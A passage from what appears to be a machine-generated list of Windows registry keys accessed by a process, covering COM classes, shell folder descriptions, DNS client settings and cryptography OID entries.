        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PropertyBag",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PropertyBag",
        "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom",
        "HKEY_CURRENT_USER\\Software\\Classes",
        "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64",
        "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Codepage",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en",
        "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\Elevation",
        "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)",
        "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\AMSI\\Providers",
        "HKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64",
        "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)",
        "HKEY_CURRENT_USER\\Software\\Classes\\WinHttp.WinHttpRequest.5.1",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087C2F4-2CEF-4953-A8AB-66779B670495}",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32",
        "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters",
        "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\DNS",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname",
        "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\System\\DNSClient",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Cryptography\\ECCParameters",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32",
